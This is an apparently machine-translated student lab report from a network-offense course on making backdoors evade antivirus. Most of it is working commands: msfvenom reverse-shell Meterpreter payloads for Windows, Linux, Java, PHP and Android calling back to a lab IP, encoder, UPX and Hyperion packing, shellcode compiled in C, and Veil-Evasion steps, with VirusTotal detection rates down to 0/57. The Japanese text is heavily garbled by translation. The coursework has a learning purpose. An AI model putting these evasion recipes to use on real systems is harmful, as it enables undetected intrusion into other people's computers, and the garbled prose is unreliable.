20175304チャオ殷2019-2020-3「ネットワーク戦技術」EXP2バックドアの原則と実践
1つの基本
基本原則と実践の殺害を避けるために節を参照して指導を
1.1マルウェア検知機構
1.1.1シグネチャに基づく検出
- 署名は、いくつかの一つまたはデータの複数枚のためのものです。そのようなデータを含む実行可能ファイル(または実行する他のライブラリ、スクリプトなど)が悪意のあるコードと見なされた場合。
- AV・ソフトウェア・ベンダーは、最も完全な、最新のシグネチャデータベースを収集しようとしているん。したがって、アンチウイルスソフトウェアを更新することが重要です。古いシグネチャデータベースは役に立たないライブラリです。
1.1.2ヒューリスティックのマルウェア検出
ヒューリスティックヒューリスティック推測するために、いくつかの一方的な特徴によると、。通常ので、正確な決意を基準の欠如。
- 利点:
- 0日のマルウェアを検出するために、
- これは、いくつかの汎用性を持っています
- 短所:
- もう少し支出システム動作のリアルタイム監視、
- いいえ署名ベースの高精度ありません
1.1.3動作ベースのマルウェア検出
挙動ベースの検出は、ヒューリスティックまたはヒューリスティック接合挙動監視と等価です。
1.2フリーテクノロジーレビュー(脱税AV)キル
総合的な技術は、次のとおりです。
-
変更署名
- 唯一のEXE
- パッカーズ:圧縮、暗号シェルケース
- そこシェルコード(Meterpreterのような)
- エンコードでエンコード
- 再コンパイル、実行可能ファイルベースのペイロード
- ソースコード
- 別の言語で書き換えた後、コンパイル(ベール - 脱税)
- 唯一のEXE
-
変化挙動
- 動作モード
- RAMベースの操作
- システムの変更を削減
- コードの正常な機能の役割を混同しましょう
- 通信
- リバウンド接続を使用してみてください
- トンネル技術を使用してください
- 暗号化された通信データ
-
型にはまらない方法
- MSFへの書き込みの攻撃コードとして、バックドアとして脆弱なアプリケーションを使用します。
- 社会階級の攻撃、AVソフトオフトリックの目標を使用してください。
- 悪意のあるソフトウェアを手作り
-
このようなバックドアを残してのアイデア:
- あなたは、脆弱なソフトウェアを書くのサービスポートを開きます。ソフトウェア自体は問題ありません。ポートが攻撃された場合次に、あなたは、システムの制御を得ることができます。
- そのようなメモリ常駐meterpreterペイロード、困難なAVソフトウェアによって検出されます。
- 我々はまた、独自の攻撃をしなければならないような小さなキズプログラムは、それが非常に簡単にまだありました。
- 自分でコンパイル方法、またはゼロから手作りもちろん最高の、普遍的なツールの機能が存在しない、AVソフトウェアが出ていない殺すでしょう。
- もちろん、最初からビルドすることは非常に困難であるが、我々は良い結果で、半マニュアルを作成するために、既存のペイロードMetasploitのを使用することができます
- あなたは、脆弱なソフトウェアを書くのサービスポートを開きます。ソフトウェア自体は問題ありません。ポートが攻撃された場合次に、あなたは、システムの制御を得ることができます。
2実験手順
2.0認識率のベンチマーク
第2の実験ではバックドアに生成された20175304_backdoor.exe
、msfvenom meterpreter生成された直接実行可能ファイルを、検出率は72分の57であった、すなわち、72スキャンエンジン57は、ウイルスとして同定されました。私たちは中に殺害を避けるために、アプリケーションプロセスを通じて、参考に見てこれを取るVirustotalのハイまたはローに認識。
2.1適切な使用のMSFエンコーダ
STEP1:生成し、次のコードを入力しmet-encoded.exe
たファイルを、バックドアコード(コード)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.62.134 LPORT=5304 -f exe > met-encoded.exe
ファイルの生成スクリーンショット:
Windowsにファイルをコピーし、アンチウイルスソフトウェアがファイルを促しますトロイの木馬ファイルです。
Virustotalがファイルを識別、検出率は、無符号が前のポイントよりも低減されるが、この文書は、単離またはすることができ、72分の56でした
ステップ2:生成し、次のコードを入力しmet-encoded10.exe
たファイルを、バックドアコード(10回をコードします)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 10 LHOST=192.168.62.134 LPORT=5304 -f exe > met-encoded.exe
Windowsにファイルをコピーし、ウイルス対策ソフトウェアは、プロンプトファイルはトロイの木馬のファイルで、削除されます。
手動で使用してファイルを復元した後Virustotalがファイルを認識し、検出率が72分の57は、上昇、下落はなかった、とさえ殺す効果を避けるために、説明書を数回マルチコーディングおよび改善されず、このアプローチは無用です。
2つの主な理由があります:
- AVベンダーの研究があるが常に復号化されるエンコーダー自体、shikata_ga_naiある(デコーダスタブ)の部分は、それのこの部分に釘付け、exeファイルに追加する必要があります。
- msfvenom exeファイルは、デフォルトパラメータまたはテンプレートは、ある一定の特性が存在する場合、それは、すべてのexeファイルを生成し、固定テンプレートを生成します。だから、一般的にはAVベンダーは一度、すべてのために悪質なコードを生成するすべてのmsfvenomを解決するように、それらの使用のための署名テンプレートを生成します。あなたが殺すためにmsfvenom自由を使用している場合、テンプレートのネイティブを使用する必要があります。
こうした世代2.2 msfvenomジャーなどの他の文書、
2.2.1 Linuxで生成されたバックドア
そして、バックドアに似て、Windowsの操作方法は、以下のコード生成トロイの木馬を入力してください。
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_linux_backdoor
Linuxのトロイの木馬の下で製造されているWindowsシステムとの唯一の違いは、コマンドを使用する必要がありますchmod +x 程序名
実行権限与えられています。実行が使用./程序名
することができます。
Linuxは中Virustotalで認識の下にバックドアを出てきません。
2.2.2生成されたJavaバックドア
ウィンドウ内およびLinuxでJavaプログラムを施行することができます。次のコード生成トロイの木馬ファイルを使用してください。
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_java_backdoor.jar
検出率のjarファイル74分の35
2.2.3生成されたPHPのバックドア
次のコード生成トロイの木馬ファイル、生成されたPHPファイルは、他の人の訪問が実行されるとき、上記のサイトに使用してください。
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_php_backdoor.php
検出率のPHPファイル73分の3
アンドロイド2.2.4生成されたバックドア
次のドキュメントを使用してトロイの木馬のコード生成は、トロイの木馬APKインストールパッケージの形で、この場合には、パッケージのユーザーは、このインストールをクリックして、実行されます。
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_android_backdoor.apk
検出率のAPKファイル74分の26
2.3ベール
2.3.1インストールプロセスのベールと問題解決
入力しsudo apt-get install veil
、それをテストする前にインストールされているので、インストールのベールを、そう何のプロセスショットはありません。
2.3.2ベール発生裏口
STEP1:ベール-回避および使用に利用回避入力コマンド入力C / meterpreter / rev_tcp.py構成インターフェース
ステップ2:入力set LHOST 192.168.62.134
およびset LPORT 5304
リバウンドに接続され、それぞれのIPアドレスとポート番号を提供しました。あなたは、入力することができますoptions
レビュー設定の結果を
ステップ3:入力しgenerate
、生成されたファイルを、ファイル名を入力し、プロンプトに従ってください。20175304_veil_backdoor
そして、あなたは、ファイルの格納ディレクトリを見ることができます。
ステップ4:生成されたファイルVirustotal認識、検出率が72分の55です。
2.4パッカーツール
技術的には、部分的なシェルに分かれて:
- 圧縮シェル
- このようなのASPack、UPXなどのアプリケーションの容積を減少させます
- 暗号化シェル
- 著作権保護、抗追跡。ASProtect、アルマジロなど
- 仮想マシン
- 独自のデザインの命令セットに同様の手段、アプリケーション命令によってコンパイルされました。VMProtect、Themidaとして、
2.4.1圧縮シェルUPX
エントリーupx 20175304_backdoor.exe -o 20175304_backdoor_upxed.exe
Windowsにファイルをコピーした後、ウイルス対策ソフトウェアは、すぐにファイルを殺します。
Virustotal認識では、検出率が72分の54です。
2.4.2暗号化シェルハイペリオン
入力wine hyperion.exe -v 20175304_backdoor_upxed.exe 20175304_backdoor_upxed_Hyperion.exe
ファイルの暗号化に加えてシェルを。
Virustotal認識では、検出率が73分の48です。
C +シェルコードを使用して2.5プログラム
ステップ1:コマンドを使用してmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f c
、いくつかのシェルコードを生成します。
ステップ2:ファイルを作成callshellcode.c
して、unsigned char buf[]
それに割り当てます。
ステップ3:入力しi686-w64-mingw32-g++ callshellcode.c -o 20175304.exe
、実行可能ファイルとしてこのファイルをコンパイルします。
ステップ4:Virustotal認識して、検出率が78分の41です。
2.6他の教室には、方法を説明していません
ステップ1:入力sudo veil
、その後、次を入力します。use evasion
無料のキルプラットフォームに:
チャートからは、入力が見ることができlist
、その後入力して、可能なペイロードを表示することができlist
、チェックを。
あなたはここで私は、Pythonを使用して、別のペイロードを使用するつもりです、C言語を使用し、数7は本の中で使用されたペイロードを導く教師で見ることができます。
ステップ2:入力use python/meterpreter/rev_tcp.py
設定ページを入力するように、あなたが今オプションまたはデフォルト値を見ることができますので、我々はいくつかのオプションを設定する必要があります。
ステップ3:入力set LHOST 192.168.62.134
とset LPORT 5304
リバウンドに接続され、それぞれのIPアドレスとポート番号を提供しました。あなたは、入力することができますoptions
レビュー設定の結果を
ステップ4:入力しgenerate
たファイル名を入力するようにプロンプトに従い、生成されたファイルを:20175304_veil_backdoor
2
ステップ5:ファイルを生成する場合、システムが要求されます如何创建负载可执行文件?
、私が選んだ、2 Py2Exe
そしてあなたは、ファイルの格納ディレクトリを参照することができ、。
STEP6:ファイルをコピーしrunme.bat Windowsに、そしてVirustotal認識して、検出率が0/57です。
殺害を避けるために、悪意のあるコードを達成するために様々な技術のアプリケーションを組み合わせることにより2.7
ベールで見ることができます2.6は、Python言語があっても検出率0に実現することができる殺す機能を回避するために使用され、バックドアファイルを生成します。
ただrunme.batファイルに加えて、圧縮と暗号化シェルケースに基づいて殺すこと自由に実現しています。
- コンピュータ環境:のWindows7
- ウイルス対策ソフトウェア:テンセントコンピュータの管理
- ソフトキルバージョン:13.5.20513.228
- キリング時間:2020年3月27日
2.8のソフトを殺すの場合には、別のコンピュータで測定し、コンピュータの名前の付いたソフトのバージョンを殺す、でも成功するために戻って実行します
- コンピュータ環境:のWindows7
- ウイルス対策ソフトウェア:テンセントコンピュータの管理
- ソフトキルバージョン:13.5.20513.228
- キリング時間:2020年3月27日
問題は3回の実験に遭遇しました
3.1プラス暗号化シェル、見つけることができない/usr/share/veil-evasion/tools/hyperion
ディレクトリを
解決策:参照のブログを以下のように、:
- まずmingwの-W64をインストールします。
apt-get install mingw-w64
- zipファイルを取得します。ダウンロードリンク
- ファイルを解凍します。
unzip Hyperion-2.2.zip
- Makefileの最初の行は変更さ
CC =i686-w64-mingw32-gcc
make
- メイクファイルの後、あなたはhyperion.exeを見ることができます
3.2使用virustotal、しばしばケイトン、終了することはできません。
回避策:ライトバージョン、使用がスムーズ。
4つの質問答え
4.1はどのようにソフトに検出された悪意のあるコードを殺すために?
それは、次の2つに分けることができます。
- シグネチャ検出:AVメーカーは、悪意のあるコードシグネチャライブラリデータを持っているが、機能の一部に格納されます。ファイルには、ソフトウェアを殺している場合は、彼の特性データの一部は、データベース内のデータの特徴である検出され、そのファイルは悪意のあるコードが含まれていると考えられています。
- ヒューリスティック検出:行動がマルウェアのようなソフトウェアルックスであれば、私たちは、悪意のあるソフトウェアとしてそれを置きます。
4.2は何をすべきかを殺すことは自由ですか?
ソフト検出され殺害され、侵入テスト技術が使用するために必要ではありません。
4.3何を殺して回避するための基本的な方法は?
署名や行動は、次の3つのカテゴリーを殺害回避するための方法があるため、検出されたの観点から、悪質なコードが発見されます。
-
非在来型方法:手作り、社会階級の攻撃。
-
署名を変更する:MSFは異なる署名に属し、この実験操作、ベール、パッカー、シェルコードをコーディング。
-
変化挙動:使用リバウンド接続、トンネリング、暗号化、データの通信のように。
4.4オープンソフトを殺すには、絶対に悪質なコンピュータコードを防ぐことができますか?
ことができない、悪意のあるコードの署名によって変更何らかの方法で、その後、マルウェアアンチウイルスソフトウェアが検出されませんが、それはファイルが安全であることを意味するものではありません、ないウイルス。
5.実験経験
実験的な操作方法は、比較的長いです。コンテンツの発見前に、いくつかの実験の操作を殺すかに精通していない避けるために行います。先生の説明と、より実践的な練習を所有し、徐々に理解と記憶を深めたいと考えているの後。